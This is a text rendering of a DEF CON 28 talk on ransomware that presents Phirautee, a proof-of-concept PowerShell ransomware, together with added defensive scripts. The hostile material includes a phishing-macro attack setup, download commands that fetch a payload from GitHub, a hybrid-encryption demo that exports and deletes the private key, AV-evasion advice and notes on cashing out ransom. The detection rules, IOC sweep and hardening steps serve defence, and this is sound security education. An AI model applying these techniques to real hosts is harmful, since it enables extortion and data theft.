Phirautee
- DEF CON 28 Presentation -
https://github.com/Viralmaniar/Phirautee


LEGAL DISCLAIMER

- Performing any hack attempts or tests without written permission from the owner of the computer system is illegal.

- If you recently suffered a breach or were targeted by ransomware and find the techniques or tools illustrated in this presentation similar, this neither incriminates me in any way nor implies any connection between myself and the attackers.

- The tools and techniques remain universal, and penetration testers and security consultants often use them during engagements.

- The Phirautee project must not be used for illegal purposes. It is strictly for educational and research purposes and for people to experiment with.
WHOAMI

- Over 8 years of experience in the field of information security and management
- Passionate about offensive and defensive security
- Runs a boutique consultancy firm, Preemptive Cybersecurity Pty Ltd
- Technical Manager at RiskIQ for the APAC region
- In my free time I develop security tools
- Presented at BlackHat USA, RootCon and (ISC)2 local chapter
- Outside of Infosec land, I like photography

https://www.linkedin.com/in/viralmaniar/
AGENDA

- History of threat actors
- Recent news on ransomware attacks
- Introduction to ransomware
- Statistics of the ransomware attacks
- Understand the Ransomware as a Service (RaaS) chain
- Introduction to the Phirautee tool and setup guide
- Demo - Phirautee
- Mitigation strategies
- Final words on some of the community projects
STEALING — OLDEST CRIME
RECENT RANSOMWARE ATTACKS

(Slide shows four news screenshots:)

- Healthcare IT News, Privacy & Security, by Mike Miliard, June 29, 2020: "UCSF pays $1.14 million to decrypt files after ransomware attack". "The medical school was hit by an opportunistic malware attack on June 1, and the encrypted data was 'important to some of the academic work we pursue as a university serving the public good,' officials said."
- "Ransomware: Attacks that start with phishing emails are suddenly back in fashion again". "Email was once the main method for delivering ransomware. Now familiar and new forms of ransomware are using it again."
- The Register, Security: "Canadian insurer paid for ransomware decryptor. Now it's hunting the scum down". "A curious tale of Bitcoin exchanges and the High Court."
- "Garmin's four-day service meltdown was caused by ransomware". "Provider of GPS services for navigation and wearable devices is returning to normal."
INTRODUCTION TO RANSOMWARE

Ransomware is a class of malware that uses cryptographic algorithms to encrypt files on the infected machine and then extorts the victim into paying via cryptocurrency, gift cards, bank transfers or mobile payments.

Upon payment the user may or may not receive a decryption key to recover the encrypted files. Most ransomware attacks are financially motivated.

The most common way of demanding a ransom is through a cryptocurrency such as Bitcoin (BTC), Ethereum (ETH) or Monero (XMR).

Recent trends show ransomware authors moving to privacy coins such as Monero (XMR). The new version of Sodinokibi, aka REvil, has abandoned Bitcoin and switched to Monero.

HOW DO I KNOW IF I AM INFECTED?

- Ransomware is usually considered one of the noisiest attacks. Infection signs are shown to users through various channels such as the desktop wallpaper, ransom notes and an infection notice.
- An alarming window opens and you cannot close it.
- Below are some examples of ransomware screens:

(Screenshot: "Buy Decryptor. To buy the decryptor, you must pay the cost of: ... Bitcoin ($993.88)")
WANNACRY HACKED EVERYTHING

(Screenshot of the WannaCry ransom screen:)

Ooops, your files have been encrypted!

What Happened to My Computer?
Your important files are encrypted. Many of your documents, photos, videos, databases and other files are no longer accessible because they have been encrypted. Maybe you are busy looking for a way to recover your files, but do not waste your time. Nobody can recover your files without our decryption service.

Can I Recover My Files?
Sure. We guarantee that you can recover all your files safely and easily. But you have not so enough time. You can decrypt some of your files for free. Try now by clicking <Decrypt>. But if you want to decrypt all your files, you need to pay. You only have 3 days to submit the payment. After that the price will be doubled. Also, if you don't pay in 7 days, you won't be able to recover your files forever. We will have free events for users who are so poor that they couldn't pay in 6 months.

How Do I Pay?
Payment is accepted in Bitcoin only. For more information, click <About bitcoin>. Please check the current price of Bitcoin and buy some bitcoins. For more information, click <How to buy bitcoins>. And send the correct amount to the address specified in this window. After your payment, click <Check Payment>. Best time to check: 9:00am - 11:00am

Payment will be raised on: 5/16/2017 00:47:55 (Time Left countdown)
Your files will be lost on: 5/20/2017 00:47:55 (Time Left countdown)
Send $300 worth of bitcoin to this address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
ATTACK STATISTICS AND INFECTION METHODS

(Slide shows two charts:)

- Line chart "Ransomware attacks: 2015-2020 (Q1)", series "Ransom Attacks", x-axis 12/31/2015, 12/31/2016, 12/31/2017, 12/31/2018, 12/31/2019, 07/30/2020.
- Pie chart of infection methods: Remote Services 51%; Phishing Emails and Social Engineering; Software vulns; Torrent, Cracked Software or USB attacks 3% (the remaining percentages are not legible in the slide).

"Most of the ransomware attacks are opportunistic"
RANSOMWARE AS A SERVICE

Malicious attackers or criminals hack into servers or hosts, make them part of a huge botnet and put the machines up for sale on a market for others to play around with.

Ransomware authors buy access to these compromised hosts and install backdoors on the systems as a persistence mechanism.

Malicious attackers then use the hosts for malware distribution, DDoS attacks, phishing campaigns, social engineering, fraud, crypto mining or for ransom.
XDEDIC

- xDedic is a great example of one such marketplace. The service was offering 70k hosts across 173 countries.
- The portal had 416 unique sellers at the time of takedown. (Caption cut off in the slide: "3300 esse..")

(Screenshot of an xDedic listing: Windows Server 2012 R2 x64, Admin Privilege: Yes, Intel(R) Xeon(R) CPU E3-1225 v3, RAM 3.91 GB, CPU Cores: 4, Antivirus: Unknown, Direct IP: No, Opened Ports: No, Virtual: No, checked 15.04.2016, uptime 4 days, price 7.00$; tabs for Internet Shops (target.com), Other Sites (yahoo.com), Poker Systems (not found), Dating Sites (not found); buttons "Check IP-Score (020$)" and "Check for Blacklist".)

Source: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07191218/xDedic_marketplace_ENG.pdf
LOGS/RDP/SSH/PP/CC/SMB MARKETPLACE

- There are a number of marketplaces out there to buy access to compromised hosts.
- The selling price for access to government networks, corporations or universities is as low as $6 per host.
Q3 2019 - Q4 2019 - Q1 2020

(Bar chart with one group per quarter and bars for Sodinokibi, Ryuk and Phobos; axis ticks 500000, 1000000, 1500000; values printed on the bars: 327931, 1339878, 15761; 71063, 779856, 12089; 157445, 3717027, 31865.)

The average ransom amount paid by a ransomware victim to their attacker - in exchange for the promise of a decryption tool - increased throughout last year. But from the third to fourth quarter of 2019, ransom payment amounts skyrocketed, from $41,198 to $84,116. The median Q4 payment was $41,179.

"The doubling of the average reflects the diversity of the threat actors that are actively attacking companies," - Coveware Report.

Attackers using Ryuk and Sodinokibi - aka REvil - are increasingly focusing their attacks on large companies where they can attempt to extort the organization for a seven-figure payout. Note that the average Ryuk ransom payment last quarter was $780,000.


TARGETED INDUSTRIES

(Pie chart "Industries victim of ransomware attacks" from the Sophos white paper "The State of Ransomware 2020"; question asked: "In the last year, has your organisation been hit by ransomware?", base: 5,000 respondents. Segments: IT & Telecom; Energy, oil/gas & utilities; Business & professional services; Construction & property; Retail, distribution and transport; Financial services; Manufacturing and production; Public sector; Other.)

Example victims called out on the slide:
- E-Sports Entertainment, Travelex, NHS, Honda
- Blackbaud, Argentine Telecom, UCSF, Cognizant
- Toll Group, Deutsche Bahn, Maersk, FedEx
- Garmin, IN SPORT, Lion, E-Sports Entertainment
Latest Ransom: $10 Million

Over 150 countries got infected
ATTACK SUMMARY

- Average ransom payment, Q4 2019: $84,116
- > 1,150% increase in 2019
- Victims paid an average of $20,000
- Organisations that sustained attacks: 205,280
- Marketplace price for RDP access: $6 - $350 per host
- Cashing out: Gift cards (13%) - buy online gift cards; Infrastructure (10%) - buy new attack infrastructure

Ransomware attacks are considered the number one threat to networks in the year 2020.

Attacks are increasingly causing extended periods of costly downtime.

Multiple methods are available for cashing out the ransom money.


INTRODUCING PHIRAUTEE

Phirautee is a proof-of-concept ransomware tool written purely in PowerShell.

It uses Living off the Land (LotL) commands built into the operating system to encrypt files on the machine.

The tool can be used during internal infrastructure penetration tests or red team exercises to validate the Blue Team/SOC response to a ransomware attack.

It uses public key cryptography to encrypt user content and exfiltrates large files via Google Drive. Upon a successful attack the ransomware asks for a payment of 0.10 BTC (~1k USD).

Detection:
- The file extension of the encrypted files is changed to ".phirautee"
- The desktop wallpaper of the compromised host is changed to the Phirautee background
- The desktop will have a Phirautee.txt file
PHIRAUTEE ATTACK SETUP

- Phishing server and domain to target an organisation.
- Email server to send malicious documents as attachments to the targeted users.
- Macro-embedded file sent as an attachment to the user, which pulls the ransomware from the remote server to the targeted machine and runs it in memory.
- Modify a couple of parameters in the ransomware file to tailor it to your use case.

For data exfiltration:
- Throwaway Gmail account
- Gmail API access to a throwaway Google Drive
- Set up a web application on Google (the API credentials used for the Drive upload)

Detailed steps for the Google Drive setup can be viewed at:
https://github.com/Viralmaniar/Phirautee/blob/master/Exfil%20Setup.md
USE OF CRYPTOGRAPHY IN PHIRAUTEE

- Uses a 2048-bit RSA key (a certificate generated on the victim machine) to encrypt files on the infected machine. Note that RSA on its own can only encrypt a message shorter than its modulus, so file contents are in practice encrypted under a symmetric content key that the RSA public key wraps; only the RSA private key can unwrap it, which is what makes the private key the thing worth stealing.
- The private key of the certificate is sent to the attacker protected by a pre-shared secret, i.e. symmetric encryption.

(Figure: side-by-side diagrams of Asymmetric Key Cryptography, User A (sender) encrypting with User B's public key and User B (receiver) decrypting with the private key, and Symmetric Key Cryptography, where both users share one symmetric key; plaintext "Hello, World".)
SYMMETRIC KEYS & ANON SMTP

- Phirautee uses two unique symmetric keys:
  - One for the private key of the certificate that is generated on the user's machine.
  - The other one for uploading exfiltrated data to Google Drive.
- The private keys are sent to Pokemail as encrypted zip files. A PokeMail mailbox is public to anyone who selects the same location, so the key material has to be encrypted before it is mailed.
- Phirautee uses the Pokemail service to distribute the attack infrastructure by creating a random, location-based email address.
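To make the key flow of the last two slides concrete, here is an added PowerShell walk-through written for this page (it is not Phirautee's own code). It follows the pattern described above: a self-signed 2048-bit RSA document-encryption certificate encrypts a file through the Windows CMS cmdlets (CMS wraps a fresh symmetric content key with the RSA public key, so RSA never touches the file bytes directly), the private key is then exported under a pre-shared passphrase and deleted from the host, and the file is only recoverable once that exported key and passphrase are re-imported. The directory C:\temp\phirautee-demo, the subject name and the passphrase are assumptions for the demo; it needs Windows PowerShell 5.1 on Windows 10 / Server 2016 or later and only touches the CurrentUser certificate store.

```powershell
# Added example (not Phirautee's code): hybrid public-key file encryption with a
# detachable private key. Touches only Cert:\CurrentUser\My and C:\temp\phirautee-demo.
$ErrorActionPreference = 'Stop'
$work   = 'C:\temp\phirautee-demo'            # assumed demo directory
$secret = 'pre-shared-demo-passphrase'         # assumed pre-shared symmetric secret
New-Item -ItemType Directory -Path $work -Force | Out-Null

# 1. Victim side: generate a 2048-bit RSA document-encryption certificate.
$cert = New-SelfSignedCertificate -Subject 'CN=phirautee-demo' `
    -Type DocumentEncryptionCert -KeyAlgorithm RSA -KeyLength 2048 `
    -KeyUsage KeyEncipherment, DataEncipherment -KeyExportPolicy Exportable `
    -CertStoreLocation Cert:\CurrentUser\My -NotAfter (Get-Date).AddDays(1)
$cerPath = Join-Path $work 'cert.cer'
Export-Certificate -Cert $cert -FilePath $cerPath | Out-Null    # public half only

# 2. Encrypt a file with the PUBLIC key. Protect-CmsMessage emits RFC 5652
#    EnvelopedData: a random symmetric content key encrypts the content and the
#    RSA public key wraps only that key, which is why RSA-2048 can cover any size.
$plain = Join-Path $work 'secret.txt'
Set-Content -Path $plain -Value 'payroll data - constructed sample content'
$enc = "$plain.phirautee"
Protect-CmsMessage -To $cerPath -Path $plain -OutFile $enc
Remove-Item $plain

# 3. Wrap the private key under the pre-shared secret (this PFX is what would be
#    exfiltrated), then destroy the local key so the host cannot decrypt on its own.
$pfxPath = Join-Path $work 'privkey.pfx'
$pw = ConvertTo-SecureString -String $secret -AsPlainText -Force
Export-PfxCertificate -Cert $cert -FilePath $pfxPath -Password $pw | Out-Null
Remove-Item -Path "Cert:\CurrentUser\My\$($cert.Thumbprint)" -DeleteKey

# 4. Without the private key in the store, decryption fails.
try {
    Unprotect-CmsMessage -Path $enc | Out-Null
    Write-Warning 'unexpected: decrypted without the private key'
} catch {
    Write-Host "Decryption without the private key failed as expected: $($_.Exception.Message)"
}

# 5. Whoever holds the PFX and the passphrase (attacker, or a responder who
#    recovered both) re-imports the key and the content comes back.
Import-PfxCertificate -FilePath $pfxPath -CertStoreLocation Cert:\CurrentUser\My -Password $pw | Out-Null
$recovered = Unprotect-CmsMessage -Path $enc
Write-Host "Recovered content: $recovered"

# Cleanup of the demo key material.
Remove-Item -Path "Cert:\CurrentUser\My\$($cert.Thumbprint)" -DeleteKey
```

Two points for defenders follow from the script: the public certificate (cert.cer, one of the IOCs later in the deck) is useless for recovery, and the only artefacts worth hunting during response are the wrapped private key and the pre-shared secret in the malware's configuration.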


(Screenshot of PokeMail.net: "PokeMail gives you an email-address that is tied to a location! You will be given access to a public mailbox for this location, so you can view and reply to all email within 10km radius. What's your location? Detect My Location, or visit Google Maps, then copy and paste the maps URL here. Set my location.")
THINK INNOVATIVE

- Can you do your entire attack in memory?
- Can you be more intrusive and silent at the same time?
- Can you compromise a host with the UAC setting "Always notify"?
- Can you delete logs and clear traces?
- Can you perform the entire malicious operation without user interaction?
- Is your code detected by an AV/EDR vendor?

(Code shown on the slide: two Living-off-the-Land download primitives. The URL and path values are cut off in the slide, and the second line is reconstructed from a partially visible "... -OutFile $destination".)

$source      = '...'   # remote URL (value cut off in the slide)
$destination = '...'   # local file path (value cut off in the slide)
$web = New-Object System.Net.WebClient
$web.DownloadFile($source, $destination)
Invoke-WebRequest -Uri $source -OutFile $destination
NO

TRY UNTIL YOU CAN BYPASS

(Screenshots of Windows Security "Protection history" entries raised while building the phishing stage, all at alert level Severe:)

- 26/7/2020 12:59 PM: Trojan:O97M/Mountsi.D!ml, category Trojan ("This program is dangerous and executes commands from an attacker"), status removed or restored.
- 29/6/2020 8:24 PM: TrojanDownloader:O97M/Dornoe.A!ams, category Trojan Downloader ("This program is dangerous and downloads other programs"), status removed or restored.
- 29/6/2020 7:59 PM: Trojan:O97M/OriAmsi.A!ml, status removed or restored.
  Affected items listed across these three entries: amsi: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; amsi: C:\Users\VM\Documents\Work\Preemptive Cyber Security Pty Ltd\2020\Powershell_List.xlsm; file: C:\Users\VM\Documents\Work\Preemptive Cyber Security Pty Ltd\2020\Defcon & BlackHat USA\Phish Demo\Promotion_List_2020_HR.xlsm
- 29/6/2020 6:28 PM: Trojan:Win32/BITSAbuse.B, category Trojan, threat blocked and removed. Affected item, CmdLine: C:\Windows\system32\bitsadmin.exe /transfer myDownloadJob /download /priority normal https://raw.githubusercontent.com/Viralmaniar/Phirautee/master/test.bat C:\temp\yo.bat (launched from the macro with Shell ..., vbNormalFocus)
- 29/6/2020 6:30 PM: Trojan:Win32/Ceprolad.A, category Trojan, threat blocked and removed. Affected item, CmdLine: C:\Windows\System32\certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Viralmaniar/Phirautee/master/test.bat C:\temp\yo.bat (launched the same way)

The first three are detections of the Office document itself (O97M macro signatures and AMSI scanning of the macro as it runs); the last two are behavioural detections of the LotL download tools the macro spawned (bitsadmin and certutil) and fire regardless of how the macro is obfuscated.
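The two command lines Defender blocked above are textbook LotL download cradles, and they are just as catchable from process-creation telemetry as from the AV engine. The following is an added example written for this page (not code from the talk): a small rule set that scores a command line for download cradles and flags an Office parent process, run over constructed sample lines that include the two bitsadmin/certutil commands from the slide. The rule names and the benign samples are assumptions made for the demonstration.

```powershell
# Added example (not from the talk): flag living-off-the-land download cradles in
# process-creation command lines. Rules are assumptions for this page; tune them.
$LolBinDownloadRules = @(
    @{ Name = 'bitsadmin transfer';    Pattern = '(?i)\bbitsadmin(\.exe)?\b.*\/transfer\b' }
    @{ Name = 'certutil urlcache';     Pattern = '(?i)\bcertutil(\.exe)?\b.*-urlcache\b' }
    @{ Name = 'powershell web cradle'; Pattern = '(?i)\b(powershell|pwsh)(\.exe)?\b.*(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|Start-BitsTransfer)' }
    @{ Name = 'mshta remote';          Pattern = '(?i)\bmshta(\.exe)?\b.*https?://' }
    @{ Name = 'regsvr32 scrobj';       Pattern = '(?i)\bregsvr32(\.exe)?\b.*\/i:https?://' }
)

function Test-LolBinDownload {
    param(
        [Parameter(Mandatory)][string]$CommandLine,
        [string]$ParentImage = ''          # optional: parent process image path
    )
    $hits = foreach ($rule in $LolBinDownloadRules) {
        if ($CommandLine -match $rule.Pattern) { $rule.Name }
    }
    # First URL in the command line, if any; useful for blocking at the proxy.
    $url = if ($CommandLine -match '(?i)(https?://[^\s"'']+)') { $Matches[1] } else { $null }
    [pscustomobject]@{
        Suspicious   = [bool]$hits
        Rules        = @($hits)
        OfficeParent = [bool]($ParentImage -match '(?i)\\(excel|winword|powerpnt|outlook)\.exe$')
        Url          = $url
        CommandLine  = $CommandLine
    }
}

# Constructed sample telemetry: the two command lines from the Defender alerts
# (spawned by the macro inside Excel), one PowerShell cradle, and two benign uses
# of the same binaries that must NOT fire.
$samples = @(
    @{ ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
       CommandLine = 'C:\Windows\system32\bitsadmin.exe /transfer myDownloadJob /download /priority normal https://raw.githubusercontent.com/Viralmaniar/Phirautee/master/test.bat C:\temp\yo.bat' }
    @{ ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
       CommandLine = 'C:\Windows\System32\certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Viralmaniar/Phirautee/master/test.bat C:\temp\yo.bat' }
    @{ ParentImage = 'C:\Windows\explorer.exe'
       CommandLine = 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''https://example.invalid/stage.ps1'')"' }
    @{ ParentImage = 'C:\Windows\System32\cmd.exe'
       CommandLine = 'C:\Windows\System32\certutil.exe -hashfile C:\temp\installer.msi SHA256' }
    @{ ParentImage = 'C:\Windows\System32\cmd.exe'
       CommandLine = 'C:\Windows\System32\bitsadmin.exe /list /allusers' }
)

$samples | ForEach-Object { Test-LolBinDownload -CommandLine $_.CommandLine -ParentImage $_.ParentImage } |
    Format-Table Suspicious, OfficeParent, Rules, Url -AutoSize
```

In production, feed it the CommandLine and ParentImage fields from Sysmon event ID 1, or the Security log's 4688 events (which only carry the command line once the "Include command line in process creation events" policy is on). The first three samples score Suspicious with an Office parent on the first two; the certutil -hashfile and bitsadmin /list lines stay clean, which is the point of keying on the download switches rather than on the binary names alone.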
DEMO TIME!

(Screenshot: an Excel workbook of HR data, Department / name / username columns, open behind the Phirautee ransom window titled "Phiarutee - DEF CON 2020 Demo" (spelled that way in the tool's window), with a "View Encrypted Files with Phiarutee" button, "Send 0.10 BTC to this account: 1HF16jtnSCuRvAThJ7p99GeroAnBkiR4Yb", a "Seconds Remaining:" countdown and the note below.)

We have encrypted your important files. For now you cannot access these files. Encrypted files have been modified with an extension "phirautee". It is possible to recover your files but you need to follow our instructions and pay us before the time runs out. If you do not pay the ransom of 0.10 BTC these files will be leaked online. The faster you contact us at XXXX@XXXXXXXX.XXX with the proof of payment, the easier it will be for us to release your files. Your backups were also encrypted and removed. Please read Phirautee.txt file on the desktop for further information.
File paths:
- C:\temp\cert.cer
- C:\temp\sys.txt
- C:\temp\backup.zip
- C:\temp\sys1.txt
- C:\temp\steal.zip
- C:\Users\$env:USERNAME\PhirauteeBackground-3.jpg

MD5s:
- 77EA9D33D144072F7B35C10691124D16
- 4E123FF3A7833F0C8AC6F749D337444D

Domains used for exfil:
- https://smtp.pokemail.net
- https://www.googleapis.com
- https://accounts.google.com
- https://raw.githubusercontent.com

Registry keys:
- HKCU\Control Panel\Desktop
IOCS FOR PHIRAUTEE

(Screenshot of Registry Editor at Computer\HKEY_CURRENT_USER\Control Panel\Desktop. Among the standard values of that key (ActiveWndTrackTimeout, CursorBlinkRate, FontSmoothing, MenuShowDelay, ScreenSaveActive, TileWallpaper, WallpaperStyle and so on) the indicator is the WallPaper value (REG_SZ), set to C:/users/VM/PhirauteeBackground-3.jpg, the image the ransomware drops into the user's profile.)
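Pulling the two IOC slides together, here is an added PowerShell sweep written for this page (not part of the talk or the project) that checks a host for every indicator listed: the dropped files and their MD5s, the Phirautee.txt note on the desktop, the WallPaper value under HKCU\Control Panel\Desktop, files renamed to .phirautee, and process-creation events whose command line references the exfil domains. The search roots, the result limits and the use of the Security 4688 log are assumptions; the hashes and paths come from the slides.

```powershell
# Added example (not from the talk): sweep one host for the Phirautee indicators
# listed on the IOC slides. Run as the user whose profile you are checking, since
# the registry key, the wallpaper image and the ransom note are per-user.
function Find-PhirauteeIndicators {
    param(
        [string[]]$Roots = @('C:\temp', $env:USERPROFILE),   # assumed search roots
        [int]$MaxEncrypted = 25,
        [int]$MaxEvents = 5000
    )
    $knownMd5 = @('77EA9D33D144072F7B35C10691124D16', '4E123FF3A7833F0C8AC6F749D337444D')  # from the slide
    $paths = @(
        'C:\temp\cert.cer', 'C:\temp\sys.txt', 'C:\temp\backup.zip', 'C:\temp\sys1.txt', 'C:\temp\steal.zip',
        (Join-Path $env:USERPROFILE 'PhirauteeBackground-3.jpg'),
        (Join-Path ([Environment]::GetFolderPath('Desktop')) 'Phirautee.txt')
    )

    # 1. Dropped files, with the MD5 compared against the published sample hashes.
    foreach ($p in $paths) {
        if (Test-Path -LiteralPath $p) {
            $md5 = (Get-FileHash -LiteralPath $p -Algorithm MD5).Hash
            $detail = if ($knownMd5 -contains $md5) { "MD5 $md5 (matches known sample)" } else { "MD5 $md5" }
            [pscustomobject]@{ Indicator = 'dropped file'; Value = $p; Detail = $detail }
        }
    }

    # 2. Wallpaper swap: HKCU\Control Panel\Desktop\WallPaper pointing at the Phirautee image.
    $wp = (Get-ItemProperty -Path 'HKCU:\Control Panel\Desktop' -Name WallPaper -ErrorAction SilentlyContinue).WallPaper
    if ($wp -and $wp -match '(?i)PhirauteeBackground') {
        [pscustomobject]@{ Indicator = 'registry'; Value = 'HKCU\Control Panel\Desktop\WallPaper'; Detail = $wp }
    }

    # 3. Victim files renamed with the .phirautee extension (capped so the sweep stays quick).
    Get-ChildItem -Path $Roots -Filter '*.phirautee' -Recurse -File -Force -ErrorAction SilentlyContinue |
        Select-Object -First $MaxEncrypted |
        ForEach-Object {
            [pscustomobject]@{ Indicator = 'encrypted file'; Value = $_.FullName; Detail = "$($_.Length) bytes, modified $($_.LastWriteTime)" }
        }

    # 4. Process creations (Security 4688; needs command-line auditing enabled) that
    #    reference the exfil domains or the staging repo named on the slides.
    $needle = '(?i)pokemail\.net|googleapis\.com|accounts\.google\.com|raw\.githubusercontent\.com/Viralmaniar'
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match $needle } |
        ForEach-Object {
            $line = ($_.Message -split "`n" | Where-Object { $_ -match $needle } | Select-Object -First 1)
            [pscustomobject]@{ Indicator = 'process cmdline'; Value = $_.TimeCreated; Detail = $line.Trim() }
        }
}

$hits = @(Find-PhirauteeIndicators)
if ($hits.Count -gt 0) { $hits | Format-Table -AutoSize } else { 'No Phirautee indicators found on this host.' }
```

The file hashes will only match the exact samples from the talk; the extension, the note on the desktop and the WallPaper value are the durable indicators because a red team tailoring the script (the setup slide says to change "a couple of parameters") will not usually bother to rename them.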
HOW DO CRIMINALS CONVERT RANSOM TO CASH?

(Screenshots: a web article "30 Best Crypto Exchanges Without KYC Verification in 2020!" and the AgoraDesk peer-to-peer exchange site.)
RANSOMWARE WRITERS ARE NOT PERFECT

- Ransomware writers are humans too. They make mistakes.
- Before paying the ransom, make sure your incident response team investigates the malware's behaviour.
- Some ransomware writers drop the encryption/decryption keys on the infected machine itself. Have your incident response team analyse the code.
- Put a proxy between the malware and its server and try modifying the amount or address. Sometimes you will see parameters with the values true and false; flipping them decrypts your files.
- Take a snapshot of the system before and after the infection if you have samples, and take note of the changes on the system.
RANSOMWARE PROTECTION IN WINDOWS

Ransomware Protection is disabled by default.

Controlled folder access helps you protect valuable data from malicious apps and threats.

The controlled folder access feature is included with Windows 10 and Windows Server 2019. It only takes effect while Microsoft Defender Antivirus is the active antivirus with real-time protection enabled; a third-party AV that replaces Defender turns it off.

Directories containing sensitive data should be added to the controlled folders.

If a malicious application tries to modify or change documents in a controlled folder, the write is blocked and a notification is generated through Microsoft Defender.


(Screenshot of Windows Security > Protection history, filtered by "Blocked folder access": "Protected folder access blocked", Low, 14/7/2020 11:20 PM; "Your administrator has blocked this action."; App or process blocked: powershell.exe; Protected folder: C:\temp\; Blocked by: Controlled folder access. "You can allow apps to access your protected folders, but you should only allow apps that you trust." Link: Controlled folder access settings.)
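The screenshot is the GUI view of a single controlled folder access block. Below is an added PowerShell example written for this page (not from the talk) that shows the out-of-the-box setting beside the hardened one, how to add the folders and allowed applications the slide talks about, and how to read the block/audit events from the Defender operational log instead of clicking through Protection history. The folder and application paths are assumptions; the cmdlets are the Defender module that ships with Windows 10 / Server 2019, and the session must be elevated.

```powershell
# Added example (not from the talk): weak default beside the hardened setting for
# Controlled folder access (CFA), plus a reader for what it blocked. Requires an
# elevated session and Microsoft Defender Antivirus as the active real-time AV.

# --- Weak: the out-of-the-box state. CFA is off and nothing is protected. ---
# Set-MpPreference -EnableControlledFolderAccess Disabled

# --- Hardened: block mode, extra data directories, narrow application allow-list. ---
Set-MpPreference -EnableControlledFolderAccess Enabled
# Default protection covers the profile's Documents/Pictures/Videos/... folders; add
# any other directory that holds data you care about (C:\temp is the slide's example).
Add-MpPreference -ControlledFolderAccessProtectedFolders 'C:\temp', 'D:\Shares\Finance'          # assumed paths
# Only specific, trusted binaries may write there. Never allow-list scripting hosts
# such as powershell.exe or wscript.exe: that re-opens exactly the path Phirautee uses.
Add-MpPreference -ControlledFolderAccessAllowedApplications 'C:\Program Files\BackupVendor\agent.exe'  # assumed path

# Roll out with AuditMode on a pilot ring first so legitimate apps surface as
# audit events (ID 1124) rather than broken workflows:
# Set-MpPreference -EnableControlledFolderAccess AuditMode

function Get-CfaStatus {
    $p = Get-MpPreference
    $modes = @{ 0 = 'Disabled'; 1 = 'Enabled'; 2 = 'AuditMode'; 3 = 'BlockDiskModificationOnly'; 4 = 'AuditDiskModificationOnly' }
    $raw = [int]$p.EnableControlledFolderAccess
    $mode = if ($modes.ContainsKey($raw)) { $modes[$raw] } else { $raw }
    [pscustomobject]@{
        Mode             = $mode
        ProtectedFolders = $p.ControlledFolderAccessProtectedFolders
        AllowedApps      = $p.ControlledFolderAccessAllowedApplications
        RealTimeOn       = (Get-MpComputerStatus).RealTimeProtectionEnabled   # CFA is inert when this is $false
    }
}

# Blocked (1123) and audited (1124) CFA events from the Defender operational log.
# The slide's screenshot is one 1123 event: powershell.exe against C:\temp\.
function Get-CfaEvents {
    param([int]$Days = 7)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1123, 1124
        StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue |
    ForEach-Object {
        # Heuristic: the first .exe-looking property is the offending process.
        $proc = ($_.Properties | Where-Object { "$($_.Value)" -match '(?i)\.exe$' } | Select-Object -First 1).Value
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Action  = if ($_.Id -eq 1123) { 'Blocked' } else { 'Audited' }
            Process = $proc
            Message = ($_.Message -split "`n")[0].Trim()
        }
    }
}

Get-CfaStatus | Format-List
Get-CfaEvents | Format-Table -AutoSize
```

Two caveats for an exercise like the demo in this deck: CFA only guards the listed folders (the ransomware still encrypts everything outside them), and it keys on the writing process, so a trusted, allow-listed application that the malware can drive will bypass it. Treat it as one layer alongside backups and the EDR detections shown earlier.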
MITIGATION STRATEGIES

- Network segmentation and detection of lateral movement. Follow the principle of least privilege and restrict access to sensitive servers. Use MFA on all important portals.
- Disable PowerShell for standard domain users (or restrict it to Constrained Language Mode) and perform application whitelisting.
- Frequent network-wide backups (offline if possible), and test that they restore; Phirautee's ransom note claims the backups were encrypted and removed as well.
- Apply patches and run a vulnerability management program.
- Have a dedicated incident response team and develop a plan for ransomware events.
- Invest in good IDS/IPS/EDR/AV/CASB products.
- Validate the effectiveness of your defensive tools and technologies through pre-approved offensive exercises.
- Organise phishing and user education training sessions for your employees.
- Have cyber insurance to help cover costs in case you need to pay the ransom. Furthermore, get your insurance policies reviewed to make sure there are no holes.
- Ask law enforcement for help; they may hold decryption keys recovered from takedowns.
(Screenshots of two free identification and decryption services:)

No More Ransom, https://www.nomoreransom.org/ : Crypto Sheriff, Ransomware Q&A, Prevention Advice, Decryption Tools, Report a Crime, Partners, About the Project. "NEED HELP unlocking your digital life without paying your attackers?" "Ransomware is malware that locks your computer and mobile devices or encrypts your electronic files. When this happens, you can't get to the data unless you pay a ransom. However this is not guaranteed and you should never pay!" GOOD NEWS.

ID Ransomware, https://id-ransomware.malwarehunterteam.com/ : upload the ransom note (the file that displays the ransom and payment information) and/or a sample encrypted file (a file which has been encrypted and cannot be opened), plus any addresses the ransomware gives you for contact, to identify the ransomware that has encrypted your data.

WWW.NOMORERANSOM.ORG

(Screenshot of the "DECRYPTED" section, listing tools for: REDRUM, ZORAB, MAPO, VCRYPTOR, JAVALOCKER, DRAGONCYBER, GOGOOGLE, MAGNIBER, SIMPLELOCKER, KOKOKRYPT, OUROBOROS, RANSOMWARED.)

The battle is over for these ransomware threats. If you have been infected with one of these types of ransomware click on the link under its name and it will lead you to a decryption tool.
ID-RANSOMWARE.MALWAREHUNTERTEAM.COM

(Screenshot of the "Which ransomwares are detected?" page: "This service currently detects 911 different ransomwares. Here is a complete, dynamic list of what is currently detected", followed by the alphabetical list of families, which the screenshot cuts off partway through the letter P.)